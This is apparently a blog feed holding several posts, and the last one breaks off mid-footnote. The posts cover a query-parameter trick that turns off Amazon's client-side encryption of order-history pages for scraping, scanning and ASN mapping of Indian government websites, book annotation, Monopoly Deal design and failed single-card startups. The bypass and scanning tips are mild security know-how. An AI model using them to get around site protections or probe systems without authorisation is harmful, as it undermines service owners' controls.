Nemo's Home 2024-11-28T10:22:57+00:00 https://captnemo.in Nemo Amazon Order History Encryption Bypass 2021-05-14T00:00:00+00:00 https://captnemo.in/blog/2021/05/14/amazon-website-order-drm <p>The Amazon US website allows you to export your Order History easily by visiting the “<a href="https://www.amazon.com/gp/b2b/reports">Order History Reports</a>” page. No such option seems to exist for the Amazon websites for other countries. I was trying to write a simple scraper for the <a href="https://www.amazon.in/gp/your-account/order-history">Amazon India Order History Page</a> to get the same data, and discovered something interesting: Amazon encrypts the Order history page, and decrypts it using client side cryptography<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup>. If you were to visit the page, and check the response HTML, you’d see something like this in the source code (fairly simplified):</p> <div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Define encrypted content in JS</span> <span class="kd">var</span> <span class="nx">payload</span> <span class="o">=</span> <span class="p">{</span> <span class="dl">"</span><span class="s2">kid</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">b70014</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">iv</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">/HenfXwYrGrrw8ff</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">ct</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">Wt78pPcibe8HAdVtoJ8+E9EGwt4IQYNghBMubBy7Zy/...</span><span class="dl">"</span> <span class="p">}</span> <span class="c1">// The HTML div to be populated with the decrypted HTML</span> <span class="kd">var</span> 
<span class="nx">elementId</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">csd-encrypted-889C1D02..</span><span class="dl">"</span><span class="p">;</span> <span class="c1">// if client side decryption library failed to load</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nb">window</span><span class="p">.</span><span class="nx">SiegeClientSideDecryption</span><span class="p">)</span> <span class="p">{</span> <span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">href</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">?disableCsd=missing-library</span><span class="dl">"</span><span class="p">;</span> <span class="k">return</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// Decrypt and populate the div</span> <span class="nx">SiegeClientSideDecryption</span><span class="p">.</span><span class="nx">decryptInElementWithId</span><span class="p">(</span> <span class="nx">elementId</span><span class="p">,</span> <span class="nx">payload</span><span class="p">,</span> <span class="p">{</span><span class="na">callSource</span><span class="p">:</span> <span class="dl">"</span><span class="s2">now</span><span class="dl">"</span><span class="p">}</span> <span class="p">);</span> </code></pre></div></div> <p>The easiest way to scrape with such hurdles is often to just <a href="https://github.com/angrykoala/awesome-browser-automation">run a complete browser</a> to scrape the site. The browser runs the javascript code with the decryption routine so you can scrape the actual content. 
However, it is much slower, and wastes CPU cycles - I try to avoid it if I can.</p> <aside><details> <summary>Aside: Click here for explanation of the decryption code</summary> <p>The server sends some HTML encrypted as a JSON payload (<code class="language-plaintext highlighter-rouge">ct</code> is truncated ciphertext in the snippet above), along with the IV and a Key ID. The <code class="language-plaintext highlighter-rouge">SiegeClientSideDecryption</code> library is then called to decrypt the payload and set the plaintext result as inner HTML of the elementID. The code redirects to a different URL in case the decryption library fails to load.</p> </details></aside> <p>I could have spent time to parse the encryption routine, extract the key and decrypt the payload. But I found a much simpler solution - Amazon offers an alternate URL which disables encryption. As a fallback, in case the decryption code fails, it adds a query parameter <code class="language-plaintext highlighter-rouge">?disableCsd=missing-library</code>. 
That disables the server side encryption entirely.</p> <p>So if you’re trying to scrape Amazon and stumped at the missing order history in the HTML, try visiting the following URLs instead:</p> <ul> <li><a href="https://www.amazon.in/gp/css/order-history?disableCsd=missing-library">https://www.amazon.in/gp/css/order-history?disableCsd=missing-library</a></li> <li><a href="https://www.amazon.co.uk/gp/css/order-history?disableCsd=missing-library">https://www.amazon.co.uk/gp/css/order-history?disableCsd=missing-library</a></li> <li><a href="https://www.amazon.com/gp/css/order-history?disableCsd=missing-library">https://www.amazon.com/gp/css/order-history?disableCsd=missing-library</a></li> </ul> <p>Amazon also sets a cookie <code class="language-plaintext highlighter-rouge">csd-key=disabled</code> but I didn’t experiment with that much.</p> <h3 id="request-my-data">Request My Data</h3> <p>Another alternative to scraping is to request <a href="https://amazon.com/gp/privacycentral/dsar/preview.html">Amazon for your data</a>. Check the <code class="language-plaintext highlighter-rouge">Retail.OrderHistory</code> CSV files in the data export. The export from <code class="language-plaintext highlighter-rouge">amazon.com</code> includes data for other countries as well. 
The feature is also available on other Amazon sites:</p> <ul> <li><a href="https://www.amazon.com/gp/privacycentral/dsar/preview.html">Amazon US - Request My Data</a></li> <li><a href="https://www.amazon.in/gp/privacycentral/dsar/preview.html">Amazon India - Request My Data</a></li> <li><a href="https://www.amazon.co.uk/gp/privacycentral/dsar/preview.html">Amazon UK - Request My Data</a></li> <li><a href="https://www.amazon.de/gp/privacycentral/dsar/preview.html">Amazon Germany - Request My Data</a></li> </ul> <div class="footnotes" role="doc-endnotes"> <ol> <li id="fn:1" role="doc-endnote"> <p>I’m hesitant to call this <a href="https://www.defectivebydesign.org/"><abbr title="Digital Restrictions Management">DRM</abbr></a>, but it might qualify as such. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> </ol> </div> Writing on books - Fantastic Beasts and Where to Find Them 2020-11-29T00:00:00+00:00 https://captnemo.in/blog/2020/11/29/fantastic-beasts-graffiti <p>“Fantastic Beasts and Where to Find Them” is a curious book:</p> <ul> <li>The in-universe book is written by Newt Scamander and was published in 1927.</li> <li>The first edition of the companion book was published in 2001. This is apparently the 52nd in-universe edition with a foreword from Dumbledore and was released to the muggle world for charity.</li> <li>The 2001 edition pretends to be Harry’s copy of the book as of the end of Harry’s 4th year at Hogwarts. As such it includes hand-written comments from the trio. 
(Yes, Hermione writes on books!)</li> </ul> <p>However, with the release of the film of the same name in 2016 - a new edition was released with lots of changes:</p> <ol> <li>6 new beasts that made an appearance in the film were added to the book<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup>: <ul> <li>Hidebehind</li> <li>Hodag</li> <li>Horned Serpent</li> <li>Snallygaster</li> <li>Thunderbird</li> <li>Wampus cat</li> </ul> </li> <li>The hand-lettering was removed.</li> <li>Dumbledore’s foreword is removed from the book, in favor of an in-universe foreword from Newt Scamander.</li> <li>“About the Author” section changes Newt’s background. He <a href="https://old.reddit.com/r/harrypotter/comments/5z8ozu/new_edition_of_fantastic_beasts_removes_part/">no longer graduates from Hogwarts</a>, just “leaves” it, as portrayed in the film.</li> </ol> <p>All of these changes are meant to fix the inconsistencies in the book with the canon; however, that also makes the book much less charming. I got myself a copy of the <a href="https://amzn.to/39ni3vh">Hogwarts Library boxset</a> a few years ago, which includes the newer edition of the book (Bloomsbury) - that means no witty comments from Ron.</p> <p>Since it didn’t have the hand-lettering, I took it upon myself to fix that mistake. Thankfully, lists of <a href="https://harrypotter.fandom.com/wiki/Fantastic_Beasts_and_Where_to_Find_Them_(companion_book)#Comments_in_the_2001_edition">all the comments in 2001 edition</a> are available <a href="https://imgur.com/a/C2a1g">on the internet</a>. The trickiest part was the “this book belongs to” page, which is missing from the newer edition. 
I ended up creating a faux-library card for that instead.</p> <p>Here is what it looks like:</p> <div class="splide" id="image-slider" style="background-color:#efefef"> <div class="splide__track"> <ul class="splide__list"> <li class="splide__slide"><img title="Ron plays hangman and loses" src="/img/fbawtft/mine/1.jpg" /><div>Ron plays hangman and loses.</div></li> <li class="splide__slide"><img title="The fake library card that says this book belongs to Harry Potter" src="/img/fbawtft/mine/3.jpg" /><div>Hermione writes on books!</div></li> <li class="splide__slide"><img src="/img/fbawtft/mine/4.jpg" /></li> <li class="splide__slide"> <img src="/img/fbawtft/mine/2.jpg" /> <img src="/img/fbawtft/mine/5.jpg" /> <img src="/img/fbawtft/mine/6.jpg" /> <img src="/img/fbawtft/mine/7.jpg" /> <img src="/img/fbawtft/mine/8.jpg" /> </li> <li class="splide__slide"> <img src="/img/fbawtft/mine/10.jpg" /> <img src="/img/fbawtft/mine/11.jpg" /> <img src="/img/fbawtft/mine/12.jpg" /> <img src="/img/fbawtft/mine/13.jpg" /> <img src="/img/fbawtft/mine/14.jpg" /> </li> <li class="splide__slide"> <img src="/img/fbawtft/mine/16.jpg" /> <img src="/img/fbawtft/mine/17.jpg" /> <img src="/img/fbawtft/mine/18.jpg" /> <img src="/img/fbawtft/mine/19.jpg" /> <img src="/img/fbawtft/mine/20.jpg" /> </li> <li class="splide__slide"> <img src="/img/fbawtft/mine/15.jpg" /> <img src="/img/fbawtft/mine/21.jpg" /> <img src="/img/fbawtft/mine/22.jpg" /> <img src="/img/fbawtft/mine/23.jpg" /> <img src="/img/fbawtft/mine/24.jpg" /> </li> <li class="splide__slide"> <img src="/img/fbawtft/mine/25.jpg" /> <img src="/img/fbawtft/mine/26.jpg" /> </li> </ul> </div> </div> <p>Thanks to <a href="https://instagram.com/avyadraws/">Bhavya</a> for helping with the troll illustration.</p> <div class="footnotes" role="doc-endnotes"> <ol> <li id="fn:1" role="doc-endnote"> <p>I didn’t like the new additions, they sound less like a textbook and more like a transcript of what happened in the film. 
<a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> </ol> </div> Analysing the Indian government cyberspace 2020-09-16T00:00:00+00:00 https://captnemo.in/blog/2020/09/16/goi-cyberspace <p>I recently did some work on analysing the Indian government cyberspace, thought I should document them somewhere outside of my Twitter<sup id="fnref:9" role="doc-noteref"><a href="#fn:9" class="footnote" rel="footnote">1</a></sup>.</p> <h2 id="list-of-goi-websites">List of GoI websites</h2> <p>I’d made a list of Indian government websites in Jan 2019:</p> <blockquote class="twitter-tweet"><p lang="en" dir="ltr">I ran <a href="https://twitter.com/18F?ref_src=twsrc%5Etfw">@18F</a> /pulse on Indian Government websites to see how many of them support HTTPS. A quick summary:<br /><br />Total Websites: 14183<br />Total Live Websites: 11710 (82%)<br />Websites with Valid HTTPS: 4753 (40% of all live websites)<br /><br />Raw Dataset for now: <a href="https://docs.google.com/spreadsheets/d/16LWWplbSAu-EkWk4R7OVsk8JM6guyZ3yiKdXIzBDT_Q/edit?usp=sharing">docs.google.com/spreadsheets</a></p>&mdash; Nemo (@captn3m0) <a href="https://twitter.com/captn3m0/status/1085050749011161089?ref_src=twsrc%5Etfw">January 15, 2019</a></blockquote> <script async="" src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> <p>The dataset was from 2 sources:</p> <ol> <li><a href="http://goidirectory.nic.in/">GoI Directory</a></li> <li><a href="https://crt.sh">crt.sh</a> (All certificates ending in <code class="language-plaintext highlighter-rouge">.gov.in</code> were used)</li> </ol> <p>I re-ran the scripts to get an updated list (12842 domains), then tabulated them against the public-suffix<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">2</a></sup> for each. There is a long-tail, and I’ve published results <a href="https://gist.github.com/captn3m0/4f3da8f07fe884e62bfab3ac85616936">here</a>. 
Here are the top public suffixes for Indian government sites:</p> <table> <thead> <tr> <th>Public Suffix</th> <th>Domains</th> </tr> </thead> <tbody> <tr> <td>nic.in</td> <td>2454</td> </tr> <tr> <td>gov.in</td> <td>7259</td> </tr> <tr> <td>in</td> <td>528</td> </tr> <tr> <td>ac.in</td> <td>490</td> </tr> <tr> <td>com</td> <td>568</td> </tr> <tr> <td>co.in</td> <td>171</td> </tr> <tr> <td>org.in</td> <td>168</td> </tr> <tr> <td>edu.in</td> <td>117</td> </tr> <tr> <td>org</td> <td>844</td> </tr> <tr> <td>res.in</td> <td>134</td> </tr> <tr> <td>net.in</td> <td>12</td> </tr> <tr> <td>net</td> <td>38</td> </tr> </tbody> </table> <h2 id="sanskari-proxy">Sanskari Proxy</h2> <p>This was a long-standing idea on my <a href="https://github.com/captn3m0/ideas">ideas repo</a>:</p> <blockquote> <p>A lot of Indian Government websites are inaccessible on the public internet, because they geo-fence it to within Indian Boundaries. The idea is to make an Indian Proxy service that specifically works only for the Geo-fenced Indian government websites.</p> <p>For eg, if <code class="language-plaintext highlighter-rouge">uidai.gov.in</code> is inaccessible, hitting <code class="language-plaintext highlighter-rouge">uidai.gov.sanskariproxy.in</code> will get you the same result, proxied via our servers.</p> </blockquote> <p>Since I’d made an updated list of GoI websites, this seemed easy enough. I realized that setting up <code class="language-plaintext highlighter-rouge">uidai.gov.sanskariproxy.in</code> would likely count as impersonation under Indian law, so I did the next best thing: run an actual proxy. Here’s the announcement tweet:</p> <blockquote class="twitter-tweet"><p lang="en" dir="ltr">Are you a security researcher outside India? 
Do you hate getting geoblocked to Indian government websites?<br /><br />Well, I made a proxy for security researchers outside India to access Indian government websites without resorting to shady VPNs.<br /><a href="https://github.com/captn3m0/sanskari-proxy">captn3m0/sanskari-proxy</a></p>&mdash; Nemo (@captn3m0) <a href="https://twitter.com/captn3m0/status/1302191390508552192?ref_src=twsrc%5Etfw">September 5, 2020</a></blockquote> <script async="" src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> <p>Project page is <a href="https://github.com/captn3m0/sanskari-proxy">https://github.com/captn3m0/sanskari-proxy</a>, and if you’d like to get access - please reach out.</p> <h2 id="cyberspace-ownership">Cyberspace Ownership</h2> <p>I’d planned to get a complete list of geoblocked websites next. While I’m progressing on this front, the results have been inconsistent/inaccurate so far. As an intermediate step, I’d made a list of IPs against every domain<sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">3</a></sup>, which looked like this:</p> <table> <thead> <tr> <th>Domain</th> <th>IP Address</th> </tr> </thead> <tbody> <tr> <td>aavin.tn.gov.in</td> <td>164.100.134.148</td> </tr> <tr> <td>abnhpm.gov.in</td> <td>14.143.233.34</td> </tr> <tr> <td>agnii.gov.in</td> <td>13.232.216.65</td> </tr> <tr> <td>ap.gov.in</td> <td>117.254.92.53</td> </tr> <tr> <td>aponline.gov.in</td> <td>125.16.9.130</td> </tr> <tr> <td>appolice.gov.in</td> <td>118.185.110.147</td> </tr> <tr> <td>attendance.gov.in</td> <td>164.100.166.114</td> </tr> <tr> <td>cgg.gov.in</td> <td>112.133.222.115</td> </tr> </tbody> </table> <p>While running numerous nmap scans (and failing), I started checking the <abbr title="Autonomous System Number"><a href="https://en.wikipedia.org/wiki/Autonomous_system_(Internet)">ASN</a></abbr><sup id="fnref:asn" role="doc-noteref"><a href="#fn:asn" class="footnote" rel="footnote">4</a></sup> for some of these IPs to see 
who was hosting each website - especially the ones I was finding were blocked.</p> <p>I stumbled upon a bulk <a href="https://team-cymru.com/community-services/ip-asn-mapping/">IP to ASN service</a> by Cymru, ran all the IPs against it and published the results. Here’s the important graph:</p> <p><img src="/img/domain-by-asn.png" alt="% of Indian Government domains hosted by each ASN. The image is a pie-chart representation showing share of each ASN. 45% of the chart is taken up by " /></p> <p>As you can expect, <abbr title="National Informatics Centre">NIC</abbr><sup id="fnref:nic" role="doc-noteref"><a href="#fn:nic" class="footnote" rel="footnote">5</a></sup> has the highest share, with <abbr title="National Knowledge Network">NKN</abbr><sup id="fnref:nkn" role="doc-noteref"><a href="#fn:nkn" class="footnote" rel="footnote">6</a></sup>, BSNL, and <a href="https://www.ctrls.in/">CtrlS</a> following at roughly 5% each. There are a few other charts on <a href="https://twitter.com/captn3m0/status/1303683006276620288">the Twitter thread</a>, and the raw data is available <a href="https://docs.google.com/spreadsheets/d/e/2PACX-1vRFcjIsqE13A7FaRID_z_ETFtGNdpznx4VcFfmEzJGjHBx-oT-urp60C9BZZK7Umc9f5QX0Z4Yd3Vja/pubhtml#">here</a> with interactive versions of each visualization.</p> <h2 id="what-next">What next?</h2> <p>I’m working on running and comparing connectivity scans to these IPs to get a better understanding of the geoblocking situation. There are also some issues with the domain list, as it seems to be missing lots of domains - so more corrections are needed.</p> <div class="footnotes" role="doc-endnotes"> <ol> <li id="fn:9" role="doc-endnote"> <p>Twitter decided to suspend 12 different accounts I had access to recently - I’m starting to get wary of using Twitter for archival now. 
<a href="#fnref:9" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:1" role="doc-endnote"> <p>A “public suffix” is one under which Internet users can (or historically could) directly register names. For eg - <code class="language-plaintext highlighter-rouge">nic.in</code> or <code class="language-plaintext highlighter-rouge">github.io</code>. Mozilla manages the list at <a href="https://publicsuffix.org/">https://publicsuffix.org/</a>. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:2" role="doc-endnote"> <p>There are issues with this approach, since domains do resolve to multiple IPs. But this is okay for the rudimentary analysis I’ve been doing so far. <a href="#fnref:2" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:asn" role="doc-endnote"> <p>Autonomous Systems (AS) is how the internet is sliced up and managed by different entities. Each AS (usually an ISP) is responsible for routing within its network, while announcing network routes on how it can be reached. <a href="#fnref:asn" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:nic" role="doc-endnote"> <p>The primary government office (under <abbr title="Ministry of Electronics and Information Technology">MeitY</abbr>) that provides infrastructure and support for government IT services. <a href="#fnref:nic" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:nkn" role="doc-endnote"> <p>National Knowledge Network is a multi-gigabit research and education network that provides a high speed network backbone for educational institutions in India. 
<a href="#fnref:nkn" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> </ol> </div> The game breaking Deal Breaker card 2020-06-24T00:00:00+00:00 https://captnemo.in/monopoly-deal <p>I have a presentation I sometimes give about Monopoly being a terrible game<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup>. I usually end it by pointing the audience to Monopoly Deal, which I introduce as “the only Monopoly edition you can enjoy”.</p> <p>The advantages are obvious:</p> <ol> <li>Much shorter game length.</li> <li>No dice rolls.</li> </ol> <p>Even if you lose badly on luck, you’ve only lost 15 minutes. While it is better than Monopoly, that isn’t to say it is a well designed game (6.3 on BoardGameGeek).</p> <p>The one major dent in the otherwise decent game is the “Deal Breaker” card, which breaks the game. I’ve house-ruled the game since forever to keep the card out of the game, since it breaks the most important rule of game design:</p> <blockquote> <h2 id="games-should-be-fun">Games should be fun<sup id="fnref:9" role="doc-noteref"><a href="#fn:9" class="footnote" rel="footnote">2</a></sup></h2> </blockquote> <p>Deal Breaker stops people from doing that. How? Read on.</p> <p><img src="/img/deal-breaker.jpg" alt="" /></p> <aside> <details> <summary>Aside: Monopoly Deal (2-5 players) Basic Rules (Click to expand)</summary> The objective of the game is to get 3 sets of properties in distinct colors. The first player to 3 sets wins the game. There are some action cards, which let you get money/properties from other players. Important action cards, relevant for this post: <ul> <li>The <strong>Deal Breaker</strong> card lets you "steal" a complete set from another player.</li> <li>The <strong>Just Say No</strong> card lets you say no to any action that any player takes against you. 
It is the only way to counter a Deal Breaker card.</li> </ul> <img src="/img/just-say-no.jpg" alt="Just say no card in Monopoly deal" /> <a href="https://youtu.be/Gc0XrTjmCV8">Here's a short 3 minute video</a> if you'd like to learn the complete rules. </details> </aside> <hr /> <p>A lot of metagaming discussion with <a href="#link-somewhere-nice">friends</a> resulted in the following observations:</p> <ul> <li>The Deal Breaker is a very powerful card (It takes you 1/3rd of the way to a victory).</li> <li>You can assume the single Deal Breaker card to be worth a complete set.</li> <li>The best use of such a card is to <em>win the game</em>. Using it earlier means giving other players a chance to drag you down from 2-&gt;1 set. But if you use it to win the game, the game ends immediately.</li> <li>Hence, Deal Breaker will always end up being the last card of the game.</li> </ul> <p>If you are playing a game with the Deal Breaker card, you’d want to save it till the very end, and win the game with it. The only possible case for not winning is the other player having a “Just Say No” card, and playing it on the Deal Breaker to negate your move.</p> <p>Ergo, the metagame converges to the following:</p> <ol> <li>Any game with Deal Breaker will end up having the Deal Breaker as the last turn.</li> <li>The only way to prevent someone else from winning with the Deal Breaker is to play a Just Say No on the Deal Breaker.</li> <li>If you have a Just Say No card, you <em>must save it till the end of the game for the Deal Breaker</em>.</li> </ol> <p>There are 2 Deal Breakers, and 3 Just Say Nos in the game. 
However, considering a single Deal Breaker is enough to win the game, and the chances of you getting a second of either card are fairly small - both the Deal Breaker and Just Say No cards will end up getting hoarded for the endgame.</p> <p>What this results in is something that breaks the fundamental rule of game design:</p> <blockquote> <h2 id="players-are-disincentivized-from-playing-the-just-say-no-card">Players are disincentivized from playing the Just Say No card.</h2> </blockquote> <p>As any Exploding Kittens player can confirm, playing a Just Say No card is one of the coolest moves in the game. It lets you stick it to the player who dares ask you for 8M<sup id="fnref:7" role="doc-noteref"><a href="#fn:7" class="footnote" rel="footnote">3</a></sup> rent. It lets you pretend you’re counting your money, and then pull out a trump card and feel awesome! By disincentivizing players from playing the coolest card in the game, the Deal Breaker card makes things less fun. And that breaks our “rule of fun”.</p> <p>In fact, the mere existence of a Deal Breaker card changes the equation. Note that there may be cases where you lose with a Just Say No card because you were hoarding it for the eventual Deal Breaker (which might never come). Someone asks you for 4M rent, and you have to pay up despite having a Just Say No card, because <em>you must save the damn card for when someone steals your set</em>. 
There are a few rare exceptions, but the Deal Breaker creates too many plays where not playing the Just Say No is indeed the correct move.</p> <p>So here is the more interesting corollary observation:</p> <blockquote> <h2 id="the-mere-existence-of-the-deal-breaker-card-breaks-the-game-by-making-the-just-say-no-card-unplayable-and-worthless">The mere existence of the Deal Breaker card breaks the game by making the Just Say No card unplayable and worthless.<sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">4</a></sup></h2> </blockquote> <p>Hence, if you’re playing Monopoly Deal, please house-rule the Deal Breaker card and make it easier for everyone. Two easy ways are:</p> <ol> <li>Remove the card from the game entirely.</li> <li>Reduce the power of the card to be the same as a Forced Deal, except let it break a set.</li> </ol> <div class="footnotes" role="doc-endnotes"> <ol> <li id="fn:1" role="doc-endnote"> <p>I have the <a href="https://slides.com/captn3m0/monopoly">slides here</a>, but they don’t stand well on their own. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:9" role="doc-endnote"> <p>Any game that eliminates players from the game breaks this rule. Popular examples are Monopoly and Mafia/Werewolf. Also see <a href="https://danielsolisblog.blogspot.com/2015/07/one-thing-to-avoid-in-game-design.html">this amazing post</a> on the biggest mistake that Guillotine makes (The “Callous Guard” card). 
<a href="#fnref:9" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:7" role="doc-endnote"> <p>Turns out that there is no symbol in Unicode for <a href="https://boardgames.stackexchange.com/questions/23909/what-is-the-monopoly-m-symbol-called">Monopoly Money</a>. <a href="#fnref:7" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:2" role="doc-endnote"> <p>We decided Deal Breaker might make sense in 6+ player games with many more cards, where it might help even the playing grounds a bit for a losing player (much more likely) instead of helping the almost-winning-player score a victory. <a href="#fnref:2" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> </ol> </div> A survey of OneCardToRuleThemAll companies 2020-06-22T00:00:00+00:00 https://captnemo.in/single-card <p>A lot of companies have come up with the idea for reducing all your cards into a single piece of plastic. Here’s a summary of all the ones I could find, and their fate. Beware: this field is very much a startup graveyard. The only remaining survivor seems to be Curve<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup> but it’s also the first one that’s attempting this outside of the US.</p> <p>There seem to be a lot of challenges (regulatory, financial, and technical) before such a thing becomes reality. And there’s Apple/Samsung Pay as well. Here’s a summary of all the companies I could find in this space. 
If I’ve missed any, please let me know, and I’ll add them here.</p> <p><img src="/img/card.jpg" alt="A photo of a hand holding a blank card" /></p> <h2 id="curve-2015-"><a href="https://www.curve.com/">Curve</a> (2015-)</h2> <blockquote> <p>Curve allows you to spend from any of your accounts using just one card, clearing the clutter from your wallet and simplifying your finances.</p> </blockquote> <ul> <li>Curve has raised a total of $74M at a valuation north of $250M, out of which £6M were from a crowdfunding campaign in 2019.</li> <li>Their waitlist is at 800,000+ users.</li> <li><a href="https://www.businessinsider.com/curve-fintech-startup-leaked-active-users-crowdfunding-2019-11">Curve faced flak for failing to disclose its usage numbers</a> (&lt;100,000 monthly active users out of total 500,000) to crowdfund investors.</li> <li>Only works with Visa/MasterCard. Used to work with Amex, but Curve has a history of working and being blocked by Amex repeatedly.</li> <li>See <a href="https://www.curve.com/en-gb/how-it-works">this page</a> for some details on how it works.</li> </ul> <h2 id="coin-yc-w13-2012-2017">Coin (YC W13) (2012-2017)</h2> <ul> <li>Coin raised a total of $15.6M.</li> <li><a href="https://techcrunch.com/2015/04/17/coin-the-one-credit-card-to-rule-them-all-is-finally-shipping/">Shipped in 2015 April</a>.</li> <li><a href="https://investor.fitbit.com/press/press-releases/press-release-details/2016/Fitbit-Inc-Acquires-Wearable-Payments-Assets-From-Financial-Technology-Company-Coin/default.aspx">Acquired by Fitbit in May 2016</a>.</li> <li><a href="https://techcrunch.com/2017/01/31/coin-shut-down/">Shutdown by Fitbit in Feb 2017</a>.</li> <li>Related: <a href="https://techcrunch.com/2019/11/01/google-is-acquiring-fitbit/">Google acquired FitBit in 2019 Nov</a>.</li> </ul> <h2 id="plastc-2014-2017">Plastc (2014-2017)</h2> <ul> <li>Single dynamic card with e-Ink touchscreen. 
See obligatory <a href="https://www.youtube.com/watch?v=8QrI3lntq3g">launch video</a> with fancy AR.</li> <li>Crowdfunded $9M on pre-orders in October 2014.</li> <li>Delayed launch to April 2016, and then again to September 2016.</li> <li>Shut down and declared bankruptcy in April 2017.</li> <li><a href="https://digg.com/2017/plastc-smart-card-bankruptcy-what-happened">Complete story via digg.com</a>.</li> </ul> <h2 id="stratos-2015-2015">Stratos (2015-2015)</h2> <ul> <li>Was supposed to cost $95/year.</li> <li><a href="https://techcrunch.com/2015/05/26/the-stratos-all-in-one-credit-card-isnt-perfect-enough/">Announced May 2015</a>.</li> <li>Raised $6.63 million over three rounds of financing.</li> <li>Ran out of money by <a href="https://techcrunch.com/2015/12/21/stratos-card-to-shut-down-just-six-months-after-launching/">December 2015</a>.</li> <li>Sold to <a href="https://techcrunch.com/2015/12/22/stratos-sells-to-ciright-one-to-avoid-collapse/">Ciright One</a> to avoid collapse.</li> <li>Seems to be dead now.</li> </ul> <h2 id="swyp-2014-2017">Swyp (2014-2017)</h2> <ul> <li>Had a pre-order campaign in 2014.</li> <li>Raised $5M from Khosla Ventures in 2017.</li> <li>Tried to pivot in 2017, failed.</li> <li>Offered customers a <a href="https://web.archive.org/web/20200225225658/http://blog.swypcard.com/blog/swyp-card-july-update">debit card with an app called Hoot</a> in 2017 as an alternative to refunds. I don’t think the Hoot card ever materialized.</li> <li>Tilt (Swyp’s payment processor) also ceased operations in 2017, due to unrelated reasons.</li> <li>Swyp <a href="https://web.archive.org/web/20200224230053/http://blog.swypcard.com/blog/swyp-card-update">finally shut down in December 2017</a>.</li> </ul> <h2 id="final-yc-w15-2014-2017"><a href="https://www.getfinal.com/">Final</a> (YC W15) (2014-2017)</h2> <ul> <li>Final was with a credit card with a different number for every website. 
As an independent card, Final doesn’t exactly fit in this list, but it’s a very relevant and loved product.</li> <li>Announced itself <a href="https://www.youtube.com/watch?v=8ZtG5DX5FR0">with a snazzy video</a> in mid 2014.</li> <li>Raised $4M and launched in August 2016, but remained invite-only till the very end.</li> <li>Final’s blog has some interesting content: A <a href="https://www.getfinal.com/company-news/2017/08/21/rfcc/">Request for Credit Cards</a> program to build card-issuance backed businesses and the <a href="https://www.getfinal.com/company-news/2017/03/30/2017-payment-card-landscape/">Payment card landscape</a> for 2017.</li> <li><a href="https://www.getfinal.com/company-news/2017/12/06/a-final-farewell/">Shut down in December 2017</a> and acquired <a href="https://www.fastcompany.com/40523758/goldman-sachs-buys-credit-card-startup-final">by Goldman Sachs</a> in an acqui-hire.</li> </ul> <h1 id="indian-landscape">Indian Landscape</h1> <p>India hasn’t seen a true single-card app yet, but there have been lots of related attempts:</p> <ul> <li><a href="https://getinfino.com/">Infino promises a single-card</a>, but it hasn’t launched yet. It had a <a href="https://trello.com/b/2h9S100Z/the-infino-roadmap">public roadmap</a>, but never launched and ultimately pivoted to a Coupon Aggregator called Meet Donut, which shut down.</li> <li>IndusInd bank has <a href="https://www.businesstoday.in/sectors/banks/indusind-launches-credit-cum-debit-card-confuse-customers/story/284912.html">tried a dual-chip debit+credit</a> card. 
Union Bank has <a href="https://www.unionbankofindia.co.in/english/debit-cum-credit-card.aspx">a similar card</a>.</li> <li>IndusInd has also <a href="https://www.businesstoday.in/top-story/new-credit-card-with-buttons-gives-users-emi-options-helps-redeem-reward-points/story/290763.html">tried an interactive credit card</a> with 3 buttons.</li> <li><a href="https://fampay.in/">FamPay</a>, <a href="https://fold.money/">Fold</a>, <a href="https://www.goniyo.com/">Niyo</a>, <a href="https://www.getonecard.app/">OneCard</a>, <a href="https://meetdonut.com/">Donut</a>🪦, <a href="https://vcard.ai/">vCard</a>🪦, <a href="https://sliceit.com/">Slice</a> <sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup> and lots of other startups are doing co-branded issuance, but that’s not the same thing.</li> </ul> <p>With the emergence of UPI, and low penetration rate of credit cards, I don’t see a market in India - but I’d love to be proven wrong.</p> <hr /> <p>Did I miss anything? <a href="/contact/">Reach out</a> and let me know.</p> <p>Thanks to <a href="https://twitter.com/thatharmansingh">Harman</a> for reviewing drafts of this, and PRL for getting me interested enough to document this.</p> <div class="footnotes" role="doc-endnotes"> <ol> <li id="fn:1" role="doc-endnote"> <p>Curve used to live on <code class="language-plaintext highlighter-rouge">imaginecurve.com</code>, then switched to <code class="language-plaintext highlighter-rouge">curve.app</code> and now to <code class="language-plaintext 